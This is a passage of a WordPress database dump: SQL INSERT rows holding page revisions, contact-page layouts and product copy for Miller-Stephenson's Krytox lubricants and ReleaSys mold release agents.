link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col][col span="3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-27 17:16:48', '2016-09-27 17:16:48', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2033, 1, '2016-09-27 17:20:37', '2016-09-27 17:20:37', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col][col span="3"]\r\n<h3>Large Inventory</h3>\r\nWith four full stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n\r\n[/col]\r\n\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-27 17:20:37', '2016-09-27 17:20:37', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2034, 1, '2016-09-27 17:21:12', '2016-09-27 17:21:12', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col][col span="3"]\r\n<h3>Large Inventory</h3>\r\nWith four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n\r\n[/col]\r\n\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-27 17:21:12', '2016-09-27 17:21:12', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2035, 1, '2016-09-27 17:59:00', '2016-09-27 17:59:00', '[row]\n\n[col span="6"]\n\n<p>[ninja_forms_display_form id="1"]</p>\n\n[/col]\n[col span="6"]\n\n<h3>Global Offices</h3>\n<p><strong>Corporate Office</strong><br />\n55 Backus Ave.<br />\nDanbury, CT 06810-7328<br />\n203.743.4447 / 800.442.3424<br />\nFax 203.791.8702<br />\ne-mail: ctsales@mschem.com</p>\n<p><strong>Illinois</strong><br />\n6348 Oakton St.<br />\nMorton Grove, IL 60053<br />\n847.966.2022 / 800.447.4866<br />\nFax 847.966.8468<br />\ne-mail: ilsales@mschem.com</p>\n<p><strong>California</strong><br />\n12261 Foothill Blvd.<br />\nSylmar, CA 91342<br />\n818.896.4714 / 800.771.8161<br />\nFax 818.896.6086<br />\ne-mail: casales@mschem.com</p>\n<p><strong>Canada</strong><br />\n280 Belfield Road<br />\nToronto, Ontario M9W 1H6<br />\n800.307.2199<br />\nFax 416.674.2987<br />\ne-mail: canadasales@mschem.com</p>\n\n[/col]\n\n[/row]\n[row]\n\n[col]\n\n[map]\n\n<p>55 Backus Ave.\nDanbury CT 06810</p>\n\n[/map]\n\n[/col]\n\n[/row]', 'Contact', '', 'inherit', 'closed', 'closed', '', '120-revision-v1', '', '', '2016-09-27 17:59:00', '2016-09-27 17:59:00', '', 120, 'https://www.miller-stephenson.com/120-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2036, 1, '2016-09-27 18:05:11', '2016-09-27 18:05:11', '[row]\n\n[col span="6"]\n\n<p>[ninja_forms_display_form id="1"]</p>\n\n[/col]\n[col span="6"]\n\n<h3>Global Offices</h3>\n<p><strong>Corporate Office</strong><br />\n55 Backus Ave.<br />\nDanbury, CT 06810-7328<br />\n203.743.4447 / 800.442.3424<br />\nFax 203.791.8702<br />\ne-mail: ctsales@mschem.com</p>\n<p><strong>Illinois</strong><br />\n6348 Oakton St.<br />\nMorton Grove, IL 60053<br />\n847.966.2022 / 800.447.4866<br />\nFax 847.966.8468<br />\ne-mail: ilsales@mschem.com</p>\n<p><strong>California</strong><br />\n12261 Foothill Blvd.<br />\nSylmar, CA 91342<br />\n818.896.4714 / 800.771.8161<br />\nFax 818.896.6086<br />\ne-mail: casales@mschem.com</p>\n<p><strong>Canada</strong><br />\n280 Belfield Road<br />\nToronto, Ontario M9W 1H6<br />\n800.307.2199<br />\nFax 416.674.2987<br />\ne-mail: canadasales@mschem.com</p>\n\n[/col]\n\n[/row]\n[row]\n\n[col]\n\n\n[/col]\n\n[/row]', 'Contact', '', 'inherit', 'closed', 'closed', '', '120-revision-v1', '', '', '2016-09-27 18:05:11', '2016-09-27 18:05:11', '', 120, 'https://www.miller-stephenson.com/120-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2037, 0, '2016-09-27 18:09:27', '2016-09-27 18:09:27', '', '', '', 'publish', 'closed', 'closed', '', '2037', '', '', '2016-09-27 18:09:27', '2016-09-27 18:09:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/2037/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2038, 1, '2016-09-27 19:18:54', '2016-09-27 19:18:54', '', 'TS4', 'hread sealant is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly.Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '989-autosave-v1', '', '', '2016-09-27 19:18:54', '2016-09-27 19:18:54', '', 989, 'https://www.miller-stephenson.com/989-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2039, 2, '2017-01-17 17:48:48', '2017-01-17 17:48:48', '[row]\n\n[col span="6"]\n\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/"]\n\n[text_box width="45" width__sm="60" scale="123" animate="fadeIn" position_x="100" position_y="20" text_align="left"]\n\n[title style="center" text="Semi-Permanent Mold Release" size="88"]\n<h1><strong>ReleaSys</strong></h1>\n<strong><em>Miller-Stephenson Exclusive Product</em></strong><a class="button alt-button white" title="" href="../chemicals/release-agents/semi-permanent/">ReleaSys Product Line</a>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="6"]\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\nMiller-Stephenson\'s exclusive mold release system, ReleaSys Release Agent is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release agent system on the market, capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. Customers who implement ReleaSys into their molding operations can expect the following benefits:\n<ul>\n 	<li>Cost-Effective, Efficient Release</li>\n 	<li>Lower rejection rates and Higher quality parts</li>\n 	<li>Superior Durability and Surface Adhesion</li>\n 	<li>Low Levels of Mold Fouling</li>\n 	<li>Minimized transfer</li>\n</ul>\n[button text="Download ReleaSys Product Guide" style="primary" link="https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-Product-Guide-1.pdf"]\n\n[/col]\n\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-autosave-v1', '', '', '2017-01-17 17:48:48', '2017-01-17 17:48:48', '', 455, 'https://www.miller-stephenson.com/455-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2040, 2, '2016-09-27 20:17:57', '2016-09-27 20:17:57', '[row]\r\n\r\n[col span="6"]\r\n\r\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/"]\r\n\r\n[text_box width="45" width__sm="60" scale="123" animate="fadeIn" position_x="100" position_y="20" text_align="left"]\r\n\r\n[title style="center" text="Semi-Permanent Mold Release" size="88"]\r\n<h1><strong>ReleaSys</strong></h1>\r\n<strong><em>Miller-Stephenson Exclusive Product</em></strong><a class="button alt-button white" title="" href="../chemicals/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="6"]\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys Release Agent is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process.  Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" style="primary" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-09-27 20:17:57', '2016-09-27 20:17:57', '', 455, 'https://www.miller-stephenson.com/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2043, 2, '2016-09-27 22:49:48', '2016-09-27 22:49:48', '', '280AB', 'Krytox 283 series anticorrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.\n<br><br />\nKrytox 280 Series contain 1% sodium nitrite.\n<br><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '649-autosave-v1', '', '', '2016-09-27 22:49:48', '2016-09-27 22:49:48', '', 649, 'https://www.miller-stephenson.com/649-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2046, 1, '2016-09-28 12:31:44', '2016-09-28 12:31:44', '[row]\r\n[col span="6"]\r\n<h2>Please fill out form for SDS Access</h2>\r\n[/col]\r\n\r\n[col span="6"]\r\n\r\n<p>[ninja_forms_display_form id="11"]</p>\r\n\r\n[/col]\r\n[row]\r\n', 'SDS Access Request Form', '', 'publish', 'closed', 'closed', '', 'sds-access-request-form', '', '', '2016-09-28 13:19:25', '2016-09-28 13:19:25', '', 0, 'https://www.miller-stephenson.com/?page_id=2046', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (2047, 1, '2016-09-28 12:29:34', '2016-09-28 12:29:34', '[row]\r\n\r\n[col span="6"]\r\n\r\n<p>[ninja_forms_display_form id="11"]</p>\r\n\r\n[/col]\r\n[row]\r\n', 'SDS Access Request Form', '', 'inherit', 'closed', 'closed', '', '2046-revision-v1', '', '', '2016-09-28 12:29:34', '2016-09-28 12:29:34', '', 2046, 'https://www.miller-stephenson.com/2046-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2048, 1, '2016-09-28 12:30:32', '2016-09-28 12:30:32', '[row]\r\n[col span="6"]\r\n<h2>Please fill out form for SDS Access</h2>\r\n[/col]\r\n\r\n[col span="6"]\r\n\r\n<p>[ninja_forms_display_form id="11"]</p>\r\n\r\n[/col]\r\n[row]\r\n', 'SDS Access Request Form', '', 'inherit', 'closed', 'closed', '', '2046-revision-v1', '', '', '2016-09-28 12:30:32', '2016-09-28 12:30:32', '', 2046, 'https://www.miller-stephenson.com/2046-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2049, 1, '2016-09-28 12:31:44', '2016-09-28 12:31:44', ' ', '', '', 'publish', 'closed', 'closed', '', '2049', '', '', '2016-09-28 12:31:44', '2016-09-28 12:31:44', '', 0, 'https://www.miller-stephenson.com/2049/', 8, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (2050, 2, '2016-09-28 13:28:57', '2016-09-28 13:28:57', '<h2 style="text-align: center;">Krytox History &amp; Product Overview</h2>\r\n<h3><strong>For the full Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">product list, click here.</a></strong></h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gearbox lubricant, and even gyroscope oil.\r\n\r\nIn 1964, new perfluoropolyether (PFPE)-based grease formulations, developed jointly with the U.S. Navy and Air Force. The result being MIL-G-27617, developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, a very wide range of industries and applications adopted PFPE-based oils and greases. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\r\nToday, of course, it’s our well-known trademark for high-performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<h3><span style="font-size: 85%;">Krytox Grades by Product:</span></h3>\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil &amp; 20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion 